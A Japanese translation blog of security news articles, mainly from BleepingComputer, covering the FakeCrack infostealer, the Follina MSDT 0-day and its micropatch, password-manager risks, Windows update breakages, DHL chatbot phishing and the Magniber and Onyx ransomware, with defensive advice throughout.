このページは、以下のサイトの和訳を中心として、セキュリティ関連のニュースを発信していくことにします。
Archive
2007まで 
2008年 
2009年 
2010年 
2011年 
2012年 
2013年 
2014年 
2015年 
2016年 
セキュリティ・メーカー関連
  ・ Emsisoft : Blog 
  ・ ESET WeLiveSecurity 
  ・ Kaspersky SecureList 
  ・ Websense Security Labs 
  ・ McAfee Blog Central 
  ・ Sophos Naked Secuirty 
  ・ Bitdefender : HOTforSecuirty 
 
マスメディア
  ・ BBC 
  ・ The Washington Post 
  ・ The Gurdian 
  ・ The Register   
  
情報サイト等
  ・ Graham Cluley 
  ・ Krebs on Security 
  ・ The PC Informant 
  ・ BleepingComputer 
 
【訳者より】 諸般の事情から長らくお休みしていましたが、少しづつになると思いますが始めていきます(2020/10/20) 
毒性化されたCCleanerの検索結果は情報窃取マルウェアを拡散する
 
 BleepingComputer : News>Security(2022/06/08) 
 パスワード、クレジットカード、仮想通貨ウォレットを盗むマルウェアは、検索結果をWindows最適化プログラムCCleaner Proの海賊版コピーに振り向けることで促進されている。
 この新しいマルウェア拡散キャンペーンは、“FakeCrack”と称され、Avastのアナリストによって発見された。彼らは、顧客の遠隔測定データから平均10,000感染/日の企てを検出しているとレポートしている。この犠牲者の殆どは、フランス、ブラジル、インドネシア、インドである。
 このキャンペーンで拡散されているマルウェアは、個人データ、仮想通貨資産を取得する強力な情報窃取マルウェアであり、インターネット トラフィックをデータ窃取用のプロクシに送る。
Black Hat SEOキャンペーン 
 この脅威のアクターは、Googleの検索結果で彼らのマルウェア配布サイトが上位にランクされるようにするためにBlack Hat SEOテクニックに従っている。そのため、多くの人々が毒物が混入された実行ファイルをダウンロードするように欺かれている。
 Avastによって発見されたこの誘惑は、Windowsのシステムクリーナであり、依然として多くのユーザが「持っておくべき」ユーティリティとして考えられているパフォーマンス最適化ツールであるCCleaner Professionalのクラックされたバージョンで発見された。
 このキャンペーンで悪用されている他のソフトウェアとしては、"cracked", "serial key", "product activator", "free download"のキーワードで宣伝されているMicrosoft OfficeとMovavi Video Editorがある。
 この毒性化された検索結果は、ZIPファイルのダウンロードを提供しているランディングページ(【訳注】検索結果や広告などを経由して訪問者が最初にアクセスするページ(DS Magazineより))を表示する幾つかのWebサイトに犠牲者を導く。このランディングページは一般的にfilesend.jp や mediafire.comのような正当なファイル ホスティング プラットフォーム上にホストされている。
 このZIPは、“1234”のような脆弱なPINを使用してパスワード保護をしている。これは単に、アンチウィルス検出からペイロードを保護するために存在している。
 このアーカイブ中のファイルは、通常“setup.exe”あるいは“cracksetup.exe”と名付けられているが、Avastは、8つの異なる実行ファイルがこのキャンペーンで使用されていることを確認している。
危険な情報窃取マルウェア 
 このマルウェアは、Webブラウザに格納されている情報(アカウント パスワード、保存されているクレジットカード、仮想通貨ウォレット認証のような)を窃取するために犠牲者を欺きインストールさせようとする。
 更に、ウォレット アドレスがコピーされていないかクリップボードを監視し、それらをマルウェア オペレーターの制御下にあるアドレスに置き換えて支払いを迂回させる。 このクリップボードハイジャック機能は、Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, Bitcoin Cashアドレスなど、様々な仮想通貨アドレスで機能する。
 このマルウェアはまた、犠牲者が検出したり認識したりすることがほぼ出来ない中間者攻撃(【訳注】通信者同士の間に第三者が勝手に割り込むタイプの攻撃(日経クロステックより))を使用して仮想通貨マーケットアカウント認証を盗むためにプロクシを使用している。
 「攻撃者は、IPアドレスを設定し悪意あるProxy Auto-Configurationスクリプト(PAC)をダウンロードすることができる」と、「このIPアドレスをシステムに設定することによって、犠牲者がリストされているドメインの何れかにアクセスするたびに、このトラフィックは攻撃者の制御下にあるプロクシサーバにリダイレクトされる」と、
Avastはそのレポートで説明 している。
 このプロクシのメカニズムは、新しいレジストリキー “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings”を追加する。
 犠牲者は、Windows Settings(Windows設定)のNetwork & internet(ネットワークとインターネット)に移動し、“Use a proxy server”(プロクシサーバを使用)オプションをOFFにすることで、これを無効化することができる。
 このキャンペーンは既に広範に拡散しており、感染レートは「高」なので、あらゆる場所からクラックされたソフトウェアをダウンロードしないようにしなさい。たとえGoogle検索で上位にランクされているダウンロードサイトであろうとも。
Windows MSDT 0-Dayの脆弱性用のフリーで非公式のパッチがリリースされた
 
 BleepingComputer : News>Security(2022/06/01) 
 'Follina'として知られる緊急の0-Dayの脆弱性を標的にWindowsシステムへの攻撃をブロックするフリーで非公式のパッチが利用可能になっている。
 
CVE-2022-30190 として追跡され、Microsoft Windows Support Diagnostic Tool (MSDT)リモートコード実行のフローとしてMicrosoftによって説明されるこのバグは、セキュリティアップデートを受け取るまで全てのWindowsのバージョン(Windows 7+、Server 2008+)に影響を与える。
 この0-Dayを成功裏に攻撃できた攻撃者は、呼び出し元アプリケーションの権限で任意のコードを実行することができ、プログラムをインストール、閲覧、変更、データの削除や、ユーザ権限で可能な新しいWindowsアカウントを作成することができる。
 Microsoftは、この激しく悪用されている0-Dayを解決するためのセキュリティアップデートをリリースしていないが、悪意ある攻撃者が脆弱性のあるシステムでコードを実行するために使用する
MSDT URLプロトコル を無効化することで攻撃をブロックする緩和策をMicrosoftは公開している。
 悪意あるドキュメントを表示しているときに悪用可能な追加の攻撃ベクトルを削除するためにWindows ExplorerのプレビューペインをOFFに切り替えることが推奨される。
公式の修正が利用可能になるまでシステムを安全にするには 
 Follinaセキュリティバグの影響を受ける
以下に示す一部のWindowsバージョン用のフリー(非公式)マイクロパッチ が、0patchマイクロパッチサービスに出現した。
 
・ Windows 11 v21H2 
 
 MSDT URLプロトコル ハンドラを無効にする(Microsoftの推奨方法)代わりに、0patchは、ユーザー提供のパス(現在Windowsスクリプト中に見つからない)のサニタイゼーション(【訳注】Webアプリケーションにおけるセキュリティ対策の1つ。SNSや掲示板から投稿された文字列に含まれる有害な文字・文字列を検知して無害化すること(ITトレンドより))することで、全てのアプリケーションに関してOS全体でWindows診断ウィザードを操作不能にすることを回避している。
 「インストールされているOfficeのバージョンは重要なことではない、また、Officeがインストールされている場合には、
他の攻撃ベクトル を介して、この脆弱性は悪用される可能性がある」と、「それ故、我々はms-msdt: URLハンドラが全く登録されていないWindows 7もパッチした」と、0patchの共同創設者Mitja Kolsekは
発言 している。
 このマイクロパッチをWindowsシステムに配備するには(Microsoftの公式のパッチがリリースされるまで)、
0patchにアカウントを登録 し、
0patchエージェント をインストールしなければならない。
 このエージェントを起動すると、ローカルセキュリティポリシーが、このエージェントを妨げない限り、このパッチは自動的にダウンロードされ適用される。
VIDEO 
進行中の攻撃で悪用されている 
 月曜日、企業向けセキュリティ企業Proofpointは、中国に関連している
TA413ハッキンググループ が、彼らのお気に入りのターゲット(チベット人ディアスポラ反対派、【訳注】チベット人ディアスポラとは. 難民は故郷たる常居所から国境を越え、他国へと流入した者のことを指すが、亡命チベット人の場合、一九五九年以降帰るべき「チベット」はもはや存在せず、現在そこは中国領になっている。父祖の地を離れ、世界に離散している状態をディアスポラという(「北米のチベット人ディアスポラ」名古屋市立大学大学院人間文化研究科 榎木美樹より))への攻撃に現在この脆弱性を悪用している。
 セキュリティ研究者MalwareHunterTeamもまた、http://coolrat[.]xyzを介して
パスワード窃取トロイ を配備するために広く使用されている中国語のファイル名のドキュメントに
スポットを当てている 。
 しかしながら、一月以上前、最初のCVE-2022-30190攻撃は、
セクストーション脅威 (【訳注】性的脅迫、インターネット上で「出会った」異性に対して性的行為の写真や動画を撮らせ、その公開を材料に脅迫を行う手口(Trend Microより))と
Sputnik Radioインタビューへの招待 を餌として使用していた。これは、このフローが他の脅威のアクターによって悪用されていることを示している。
 CISAはまた、Microsoftがオンライン上でこの脆弱性が積極的に悪用されていることを報告した後、Windows管理者とユーザーにMSDTプロトコルを無効にするように
促した 。
 4月に、この0-Dayを通知したセキュリティ研究者Shadow Chaser Groupの
CrazymanArmy は、Microsoftは
「セキュリティに関連する問題」ではない として、彼の具申を拒否したと発言している。しかしながら、Microsoftは後で、
リモートコード実行の影響 があるとして、この脆弱性具申レポートに応じている。
パスワードマネージャが思われているほど安全とは言えない8つの理由
 
 MUO : Security(2022/05/25) 
 パスワードマネージャを使用すれば安全なのか? パスワードマネージャには多くの利点があるが、それらは、それらの問題を依然として持っている。以下が、認識する必要のあることである。
 パスワードマネージャは、パスワードを保持するために推奨されるオプションである。パスワードマネージャは、使用しているあらゆるサービス用の強固で一意のパスワードを格納することを可能にしている。パスワードマネージャはまた、毎回パスワードをタイプすることなくログインすることが可能なので、キーロガーからあなたを保護する。
 しかしながら、パスワードマネージャは完全ではない。また、全ての人が単一の場所に彼らのパスワードの全てを格納するという考えを好んでいるわけではない。パスワードマネージャを使用しセキュリティ侵害された場合、ハッカーは、あなたの全てのアカウントへのアクセスを取得する可能性がある。
 では、パスワードマネージャは、どれほど安全なのか? どれかのパスワードマネージャを使用する必要はあるのだろうか?
パスワードマネージャを安全とする4つの理由 
 パスワードマネージャは広く推奨されている。以下にパスワードマネージャを使用する幾つかの利点を示す。
1. 256-bit AES 
 全てのパスワードマネージャは256-bit Advanced Encryption Standards(【訳注】高度暗号化標準、アメリカが2001年に標準暗号として定めた共通鍵暗号アルゴリズム(Wikipediaより))を使用している。これは、あなたが提供した
あらゆる情報を暗号化する ために使用され、クラックできないと考えられている。これは、あなたのパスワードマネージャがハッキングされたとしても、あなたのパスワードの全ては依然として入手され難い。
2. ゼロトラスト(Zero Trust) 
 全てのパスワードマネージャはゼロトラストを使用する。これは、あなたのマスターパスワードがあなたのデバイスを離れる前に暗号化されることを意味している(【訳注】PCやスマホ上で暗号化された後に送信される)。このため、パスワードマネージャを運営している企業のスタッフでさえアクセスすることはできない。
3. 二要素認証 
 殆どのパスワードマネージャは、二要素認証を使用することを可能にしている。これは追加の防御ラインの提供である。これは、二要素認証デバイスにアクセスできない限り、いかなる者もあなたのパスワードマネージャにアクセスできないようにする。これは、ハッカーがどうにかしてあなたのパスワードを解析した場合でも、依然としてそれを使用して、あなたのアカウントにアクセスできないことを意味している。
4. 優れた代替案 
 パスワードマネージャは、あなたがパスワードを覚えておく必要がないので
強固なパスワードを使用する ことを可能にしている。また、全てのアカウントに対して異なるパスワードを使用するように奨励している。全てのパスワードを一つの場所に保持することは理想的ではない。しかし、脆弱なパスワードの使用をしなくて済むのであれば、実行する価値のある妥協である。
パスワードマネージャが思われているほど安全ではない8つの理由 
 
 パスワードマネージャは人気があるが、欠陥がないわけではない。適切に使用されていない場合は、あなたのアカウントは安全性が実際に悪くなる。パスワードマネージャの使用に関連する幾つかのリスクについて述べる。
1. 全ての物が一つの場所に 
 パスワードマネージャは、情報の全てを一つの場所に格納するよう促す。これはしばしば、パスワードだけでなく支払い情報の詳細も含んでいる。パスワードマネージャは、非認証アクセスを防御するように設計されているが、理想的ではない。パスワードマネージャは、ハッキングされる可能性を減少するが、あなたがハッキングされたなら、ダメージの可能性は増大する。
2. キーロガーはより危険な存在になる 
 パスワードマネージャは、多くの場合あなたを
キーロガーから保護する 。パスワードマネージャは、自動入力を使用してアカウントにログインすることを可能にしているので、キーロガーは役に立たない。しかし、あなたがパスワードマネージャにパスワードを入力している時はどうだろうか?
 このシナリオではキーロガーは有用であり、あなたのアカウントへの一つへのアクセスを取得するというより、ハッカーは全てのパスワードへのアクセスを取得することが可能になるだろう。パスワードマネージャの一つを使用するのであれば、マルウェアに汚染されているコンピュータの使用を回避する必要がある。
3. 簡単なアカウントへのアクセス 
 個人のデバイスでパスワードマネージャにログインしたままにしている人々がよく見られる。これは便利であるが、誰かがそのデバイスにアクセスすると、その人達はパスワードと支払い情報の詳細の全てにアクセスできることを意味している。これは、あなたがパスワードマネージャを使用したい時だけパスワードマネージャにログインすることによって軽減される。しかし、これは間違いなくソフトウェアの有用性を低下させる。
4. 一部の機能は有料バージョンだけ 
 パスワードマネージャは、大抵有用な追加機能を持っている。例えば、ある追加機能は、あなたのパスワードがダークWeb上にリークされているか否かを告げてくれる。他には、あなたのパスワードを評価し、それが如何に安全かを告げてくれるものもある。これらの機能の問題点は、あなたが特別料金を支払った場合にのみ利用可能になっていることである。無料のパスワードマネージャを使用しているのであれば、あなたは可能な限りの最高の防御を得ることができていない。
5. バックアップは常時利用されているわけではない 
 殆どのパスワードマネージャは、あなたのパスワード金庫をバックアップすることを可能にしている。しかし、誰もがこの機能を使用しているわけではない。パスワードマネージャがあなたのパスワードの唯一のコピーであるのなら、あなたがそのパスワードを忘れたり、サーバーがダウンしたりすると、あなたは全アカウントへのアクセスを失う。これは定期的にパスワードをバックアップし、そのバックアップを何処か安全な場所に保持することによって回避することができる。
6. パスワードマネージャはハッキングされる 
 パスワードマネージャは安全な製品であるが、それはパスワードマネージャを所有する企業がハッキングされないということを意味してはいない。実際、パスワードマネージャにはハッキングされた歴史がある。LastPassは2015年にハッキングされ、OneLoginは2017年にハッキングされている。いずれの場合も、顧客のパスワードが晒されることはなかったが、これは、パスワードマネージャを所有する企業がハッカーをシャットアウトできないことを示している。
7. 二要素認証はオプションになっている 
 二要素認証はパスワードマネージャのオプショナル機能である。二要素認証を使用していないのであれば、あなたのパスワードは安全ではない。ハッカーが、あなたのマスターパスワードをなんとか解析した場合、あなたのパスワード金庫へのアクセスを停止する手段はない。これは、過去に様々な場所で同じパスワードを使用していた場合、あなたがフィッシング詐欺に引っかかった場合、あるいはコンピュータにキーロガーが存在していた場合に発生していたことである。
8. パスワードを忘れる可能性 
 全てのパスワードマネージャは同じ弱点を持っている。マスターパスワードを失うと、あなたは全てのパスワードへのアクセスができなくなる。この問題は、バックアップを保持し、マスターパスワードを安全な場所に格納することによって軽減することができるが、一つの場所にパスワードの全てを格納する危険性を浮き立たせることになる。
パスワードマネージャは安全なのか? 
 パスワードマネージャには固有の欠陥があるものの、ほとんどの人々はパスワードマネージャを使用することで便益を得るだろう。パスワードマネージャは、覚え難い複雑で一意のパスワードを設定することを可能にする。
 これらの製品を避けるのではなく、欠陥を理解した上で、それに応じて使用する必要がある。
 パスワードマネージャーは、キーロガーに対する完全な保護を提供していない。また、パスワードマネージャをパスワードの唯一のコピーとして使用してはならない。パスワードリストは定期的にバックアップし、マスターパスワードのコピーは安全な場所に格納する必要がある。
Windows 11 KB5014019はTrend Microの身代金要求型マルウェア防御を破壊する
 
 BleepingComputer : News>Security(2022/05/26) 
 今週のWindowsオプションの累積アップデートプレビューは、Trend Microのセキュリティ製品の一部で互換性の問題(身代金要求型マルウェア防御機能を含む一部の互換性を破壊)を発生させている。
 「Trend Microの幾つかの末端機器及びサーバ保護製品によって使用されているUMHコンポーネントは、身代金要求型マルウェア防御のような幾つかの高度な機能を担っている」と、このアンチウィルス企業は
明らかにしている 。
 「Trend Microは、Microsoft Windows 11及びWindows 2022のオプショナル プレビューパッチ(KB5014019)を適用し再起動するとTrend Micro UMHドライバが停止する潜在的な問題を認識している。 」
 この既知の問題は、Apex One 2019, Worry-Free Business Security Advanced 10.0, Apex One as a Service 2019, Deep Security 20.0, Deep Security 12.0, Worry-Free Business Security Services 6.7を含む幾つかのTrend Micro末端機器用に使用されているUser Mode Hooking (UMH) コンポーネントに影響を与える。
 この日本のサイバーセキュリティ企業は、2022年6月の定例パッチの一部として、このアップデートプレビューが全てのWindowsユーザに押し付けられる前に、現在この問題の解決に取り組んでいる。
Trend Microの末端機器用ソフトの機能を復元する方法 
 幸いにも、通常の定例Windowsアップデートと異なり、
今週のプレビューアップデート はオプションである。プレビューアップデートは、一般にリリースする前にバグの修正とパフォーマンスの改善をテストするために発行される。
 Windowsユーザは、設定 > Windows Updateからオプショナル アップデートを手動に変更する必要がある。これで、「今すぐダウンロード」ボタンをクリックするまでオプショナルアップデートはインストールされないので、影響を受ける可能性のあるユーザの数が制限される。
 影響を受けるWindowsプラットフォームは、Windows 11, Windows 10 version 1809, Windows Server 2022を稼働しているシステムであり、クライアントとサーバの両方を含んでいる。
 このWindowsのオプショナル パッチをインストールしてしまったTrend Microの顧客は、このパッチを一時的にアンインストールするか、Trend Microのサポートに連絡し、彼らのセキュリティソフトの機能を回復するUMHデバッグモジュールを取得しなさい。
 Windowsユーザは、
管理者権限のコマンドプロンプト から以下のコマンドを使用して、このプレビューアップデートを削除することができる。
Windows 10 1809: wusa /uninstall /kb:5014022 
フィッシングWebサイトは今、あなたの認証を盗むためにチャットボットを使用している
 
 BleepingComputer : News>Security(2022/05/19) 
 フィッシング攻撃は今、自動化されたチャットボットを使用して訪問者のログイン情報を脅威のアクターに手渡すようにガイドしている。
 このアプローチは攻撃者のためにプロセスを自動化しており、チャットボットが一般的に正当なブランドのWebサイトに見られることから、悪意あるサイトを訪問した者に正当なサイトであるという感覚を与えている。
 この新しいフィッシング攻撃の開発は、Trustwaveの研究陣によって発見され、このレポートの公開前にBleeping Computerと共有された。
これはE-Mailで始まる 
 このフィッシングプロセスは、DHL(【訳注】航空機を主体とした国際宅配便、運輸、ロジスティクスサービスを扱うドイツの国際輸送物流会社(DHLより))配送ブランドを装い小包の配達に関する情報を含んでいると主張するE-Mailで始まる。
 E-Mail中の'Please follow our instructions'をクリックすると、フィッシングサイトへのリンクを含むPDFファイルがロードされる。脅威のアクターがPDFドキュメント中にフィッシングリンクを表示させるのは、E-Mailセキュリティソフトウェアをバイパスするためである。
 しかしながら、このPDF中のURLボタン(URLリンク)は、未配達の小包に発生している問題を解決すると装うフィッシングサイト(dhiparcel-management[.]support-livechat[.]24mhd[.]com)に犠牲者を連れて行く。
 ここでチャットボットに引き継がれる。
チャットボットは、あなたの認証情報を盗む 
 フィッシングページがロードされると、訪問者は一般的に認証情報を盗むために使用されるインチキのログインフォームの代わりに、その小包が配達されない理由を説明するWebチャットに出迎えられる。
 このWebチャットは、配達できないのは小包のラベルが破損しているからであると説明する。このWebチャットは、このスカムの正当性を更に追加するために、申したてられている小包の写真も表示する。
 このバーチャル アシスタントは、訪問者に予め定められた対応を行うので、会話は固定されており、常に申し立てられている小包の破損したラベルの写真を表示するようになっている。
 この問題のために、このチャットボットは、犠牲者に住所や勤務先の住所、姓名、電話番号等のような詳細な個人情報を与えるように要求してくる。
 その後、この配達はスケジュールされたことになり、このフィッシングページがより正当なものであるかのように振る舞うために、偽のCAPTCHAステップが表示される。
 次に、犠牲者は、DHLアカウント認証情報の入力を要求するフィッシングページにリダイレクトされる。最後に、おそらく配送コストを贖うための支払いのステップに導かれる。
 最後の"Secure Pay"ページは、カード所有者名、カード番号、有効期限、セキュリティコードを含む典型的なクレジットカード決済フィールドを含んでいる。
 個人情報の詳細が入力され、"Pay Now"ボタンがクリックされると、犠牲者は提供したスマートフォンにワンタイム パスワード(OTP)をSMSを介して受け取る。これは正当性の感覚を追加する。
 Trustwaveのアナリストはランダムな文字列を入力してテストした。このシステムは不正なセキュリティコードとするエラーを戻してきた。OTP検証の実装は本物である。
 正しいコードが入力されると、このインチキのページは"Thank you!"メッセージを表示し、提出が受け付けられたことを確認する。
キャンペーンは「本物」になりつつある 
 脅威のアクターは、CAPTCHA、OTPs、チャットボットのような一般的に本物のWebサイトで発見されるメカニズムの使用を増加させているので、犠牲者は情報窃取の企てに気がつくことが困難になってきている。
 これは、即座のアクションを要求する一方的な通信を受信したとき、特にメッセージ中にボタンやURLリンクが埋め込まれている場合には、警戒を強化する必要がある。
 DHLや他の配送サービスが、あなたに何らかの対応を要求している場合、提供されているリンクをクリックするのではなく、必ずブラウザの新しいタブで実際のWebサイトを開きなさい。
 次に、その間違いのないプラットフォームであなたのアカウントにログインしなさい。そして、全ての保留中のアイテムや警告をチェックしなさい。あるいは、顧客サポートに自分自身でコンタクトしなさい。
 いつもどおり、フィッシングページを発見する最高の方法は、そのWebサイトのURLを検証することである。それが疑わしく見えたり、あるいは正当なドメインに一致しない場合は、そのページにいかなる個人情報も入力してはならない。
 この場合、成り済ましているDHLのURLは、"24mhd.com"ドメインで終わっている。これは明らかにDHLのWebサイトではない。そして、フィッシングの企ての明らかな兆候である。
Windows 11のKB5013943アップデートは0xc0000135アプリケーションエラーを発生させる
 
 BleepingComputer : News>Security(2022/05/11) 
 Windows 11のユーザは、最近のWindows 11 KB5013943累積アップデートをインストールした後にアプリケーションの起動を試みた時、0xc0000135エラーを表示されている。
 昨日、Microsoftは、新しいWindows 11累積アップデートをリリースした。これは、セキュリティの脆弱性と
2022年05月の定例パッチ の一部のバグを修正するものである。
 これらのアップデートには、
Windows 11 KB5013943アップデート が含まれている。このアップデートは、.NET Framework 3.5アプリケーションが、Windows Communication Foundation (WCF)とWindows Workflow (WWF)コンポーネントを使用している場合には、
それらのアプリケーションが起動しない 問題を発生させるバグの修正を含んでいた。
KB5013943アップデートは .NET アプリケーションを破壊する 
 しかしながら、Microsoftの修正は、さらなる問題を発生させたかのようである。現在、Windows 11のユーザは、KB5013943アップデートをインストールした後、もはや起動しなくなった広範な種類のアプリケーションを報告している[
1 , 
2 , 
3 , 
4 , 
5 ]。
 影響を受けるアプリケーションはユーザにより様々であるが、報告されている問題あるアプリケーションの一部には、ProtonVPN, PowerShell, Event Viewer, Sound Blaster Command, KeePass, Visual Studio, Discord, ShareX等が含まれる。
 このアプリケーションを開こうとすると、Windows 11は、以下に示す「"The application was unable to start correctly (0xc0000135、【訳注】アプリケーションを正しく初期化できませんでした). Click OK to close the application."というエラーを表示する。」
 「私のラップトップを最新のWindows 11のバージョンにアップデートしただけなのに、多くのアプリケーションエラーと複数のアプリケーションの自動起動エラーが表示されるようになった。エラー0xc0000135を修正する方法はありますか?」これはMicrosoft Answer Forumへの
ユーザの投稿 である。
 「KB5013628 / KB5013943の後にエラーが発生している人はいますか ー このアプリケーションは正しく初期化できなかった(0xc0000135)、あらゆる.NET 4.8プログラムは初期化できない ー bing/visual studio等」と、他のユーザがTwitterで
説明している 。
 0xc0000135エラーは、プログラムが正しく操作するために要求するDLLファイルの発見に失敗したことを示しているので、このプログラムは起動しない。この特定の問題では、アプリケーションが.NET DLLsを探し、それを発見できなかったようである。
 Windows 11 KB5013943アップデートをアンインストールすると、この問題は解決するが、そのデバイスは新しくパッチされた脆弱性に対して無防備なまま放置される。
 Windows 11のユーザは、NET 3.5を有効にするか再インストールすることで、この問題が修正されることを発見した。
 これを実行するには、コントロールパネル > プログラム > Windows機能の有効化または無効化 に進み、必ず、.NET Framework 3.5 (includes .NET 2.0 and 3.0) 及び Net Framework 4.8 Advanced Servicesをチェックしなさい。以下の画像参照。
 代替方法としては、Windows 11の管理者権限でのコマンドプロンプト(管理者としてcmd.exeを実行)を起動し、以下のコマンドを実行して、この機能を有効にする。
dism /online /enable-feature /featurename:netfx3 /all 
 これが動作しない場合は、コントロールパネルから .NET 機能をアンインストールし、次に、それらを再インストールして、修復プロセスを実行しなさい。
 最後に、他の全てのことも失敗したなら、KB5013943アップデートをアンインストールしなさい。しかしながら、この操作は、最新のセキュリティの驚異からデバイスを無防備にしたままにするので強く反対する。
インチキのWindows 10アップデートはMagniber身代金要求型マルウェアに感染させる 
 BleepingComputer : News>Security(2022/04/30) 
 今月始めに始まった巨大なキャンペーンであるインチキのWindows 10アップデートは、Magniber身代金要求型マルウェアを拡散するために使用されていた。
 ここ数日に渡り、BleepingComputerは、世界中のユーザをターゲットにした身代金要求型マルウェア感染に関する多くの支援要請を受け取った。
 このキャンペーンを解析中に、我々はWindows 10累積アップデートもしくはセキュリティアップデートであると信じてインストールした後、Magniber身代金要求型マルウェアに感染したとする読者の報告を我々の
フォーラム トピック に発見した。
 これらのアップデートは、最も一般的であるWin10.0_System_Upgrade_Software.msi [
VirusTotal ] 、 Security_Upgrade_Software_Win10.0.msiのような名前で配布されている。
 以下に見られるように、他のダウンロードはインチキのknowledge baseを使用してWindows 10累積アップデートを装っている。
・ System.Upgrade.Win10.0-KB47287134.msi 
 VirusTotalへの提出によると、このキャンペーンは、2022年04月08日に開始されたようであり、それ以来、世界中に大拡散しているようである。
 インチキのWindows 10アップデートが促進されている方法は100%明らかになっているわけではないが、このダウンロードは、偽のWarez and Crack(【訳注】インターネットなどを用いて非合法的に配布・販売されている商用ソフトウェアとクラックツールを配布しているサイト)サイトから配布されている。
 一旦インストールされると、この身代金要求型マルウェアは、シャドーボリュームコピーを削除し、次にファイルを暗号化する。ファイルを暗号化している時、この身代金要求型マルウェアは、以下に示したように、.gtearevfのようなランダムな8文字の拡張子を追加する。
 この身代金要求型マルウェアはまた、各フォルダ内に身代金支払い用のMagniber Tor支払いサイトへのアクセス方法への指示を含むREADME.htmlと名付けられた脅迫文を作成する。
 Magniber支払いサイトは'My Decryptor'と題されており、犠牲者に無料で一つのファイルを復号することや、サポートへのコンタクトを可能にしており、犠牲者が支払いを実行するための身代金額とBitcoinアドレスを定めている。
 BleepingComputerが支払いページを確認したところによると、ほとんどの身代金の要求金額は、およそ2,500 USD(324,858円、1$=129.94円換算)もしくは0.068 Bitcoinであった。
 Magniberは安全であると見なされる。つまり、ファイルを無料で回復するために悪用される可能性のある弱点は含まれていないことを意味している。
 残念ながら、このキャンペーンは、企業ではなく主に学生と消費者をターゲットにしているため、身代金の要求額は多くの被害者にとってあまりに高額である。
注意: Onyx身代金要求型マルウェアはファイルを暗号化する代わりに破壊している 
 BleepingComputer : News>Security(2022/04/27) 
 新しいOnyx身代金要求型マルウェアは、2MBより大きなファイルは暗号化するのではなく破壊しているので、身代金を支払ったとしても、これらのファイルが復号されることはない。
 先週、セキュリティ研究者MalwareHunterTeamは、Onyxと呼ばれる新しい身代金要求型マルウェアが稼働していたことを
発見した 。
 今日の殆どの身代金要求型マルウェアのように、Onyxの脅威のアクターは、デバイスを暗号化する前にネットワークからデータを盗む。このデータは、身代金が支払われなければ、このデータを公開すると脅す二重の脅迫(Double-Extortion)に使用される。
 この身代金要求型マルウェアのギャングは、今までかなり成功しており、彼らのデータリークのページには6人の犠牲者がリストされている。
Onyx身代金要求型マルウェアは殆どのデータを破壊する 
 Onyx身代金要求型マルウェアの技術的機能面に関しては、MalwareHunterTeamが暗号化ツールのサンプルを発見した今日時点で分かっていない。
 判明していることで懸念されるのは、この身代金要求型マルウェアがファイルを暗号化する代わりにランダムなジャンク データで多くのファイルを上書きすることである。
 以下のソースコードから分かるように、Onyxは2MBより小さなファイルは暗号化する。しかしながら、MalwareHunterTeamによれば、Onyxは、2MBより大きなファイルは全てジャンク データで上書きする。
 これはランダムに作成されたデータであり暗号化ではないので、2MBを超えるファイルに関しては復号する方法はない。
 犠牲者が身代金を支払ったとしても、復号ツールは2MBより小さな暗号化されたファイルだけしか復号しない。
 チェコCERTのフォレンジック(【訳注】デジタル機器から 法的証拠に関わる情報を抽出しハッキングやマルウェアなどのセキュリティを脅かす脅威の特定に活用される技術(デジタルデータ フォレンジックより))アナリスト
Jiri Vinopal によると、この身代金要求型マルウェアは、
Chaos身代金要求型マルウェアに基づいて いる。同じダメージを与える暗号化ルーチンを含んでいることによる。
 暗号化ルーチンにおける破壊の本質は、バグではなく作為なので、身代金を支払わないように犠牲者に強く忠告する。
2022/04/28 Update  破壊されるのは2MBより大きなファイルであり、このマルウェアはChaos身代金要求型マルウェアの亜種である。
アニメーションQRコード: 動作方法と作り方 
 BleepingComputer : News>Security(2022/04/23) 
 QRコードでより目立つものと認識されている二次元バーコード(2D)は、最近すべてのものに関して「非接触」が要求されていることもあって再流行している。
 Coinbase(米国の暗号資産取引所)も、この機会を掴むために時間を無駄にしなかった。Superbowl 2022 TV広告は、全体的にあなたの注意を惹きつける目的で真っ黒な背景に
ミステリアスなQRコード があることを除いて何もなかった。
 これらの奇妙な正方形がどのように機能するのかを正しく理解できていない人々でさえ、いずれかの段階で頻繁に使用している。
 しかし、QRコードに動いたり、アニメーションしたりしているものがあるだろうか? どのように動作しているのか?
スキャンしてみよう 
 今週、科学技術者であり、"cyborg hardware hacker"であり、YouTuberであるZack Freedmanは、
Repeated Failure によって作成され、バズっている
GIFをツイート した。
 以下に示すこのGIFは、一部の人が認識できるかもしれない移動フレームを備えたアニメーションQRコードを含んでいる。これは、Rick Astleyの有名なNever Gonna Give You Up(ギヴ・ユー・アップ)ミュージックビデオのシーケンスである
 曲の歌詞とミュージックビデオは、netizens(【訳注】ネチズン。ネット市民)にもハッキングされた企業をトローリングしている
悪意のアクター にも、長い間人気のあるミーム(【訳注】模倣によって伝えられる情報)であった。
 しかし、このGIFは、芸術化したバーコードではなく、実際にQRコードとして動作する。自分自身でスキャンしてみよう!
 あなたのQRコード スキャナが機能しているのなら、上のGIFはYouTube上の公式の
Never Gonna Give You Up に導くだろう。
 この予期せぬ変化は多くの人々を驚かせた。ある人はこれを"
weird wizardry (奇妙な魔法)" だの"
LEGEND (伝説)"だのと言い、また、多大なトラフィックのためにYouTubeがこのビデオの「レート制限」を開始したと不満を言う者もいた。
 実際に、
QR4とソフトウェアエンジニアJeroen Steemanによって作成されたもの のようなオンライン ツールが存在しているので、あなた独自のアニメーションQRコードを作成することが可能である。
バーコードを掘り下げる 
 
 バーコードの起源は1950年台に遡る。Drexel University(ドレクセル大学)の二人の大学院生が電子製品情報のカタログ化と検索のための
システムの特許 を取得したことに始まる。
 しかしながら、本来在庫追跡コンセプトとして始まったこのシステムは、2Dバーコードの誕生により複雑性、利用可能なフォーマット、
縦横比 の点で徐々に進化した。
 一般的にQR(クイック レスポンス)として知られるこれらのマトリックスは、2Dバーコードの一種であり日本の自動車関連企業Denso Wave(デンソーウェーブ)によって発明されたものである。この企業は、依然として'QR Code'という用語の
商標 と技術
特許 を保持している。
 書籍の表紙や商品に見られる
UPC (【訳注】アメリカ、カナダで使用されている統一商品コード(バーコード講座より))のような一次元バーコードは、
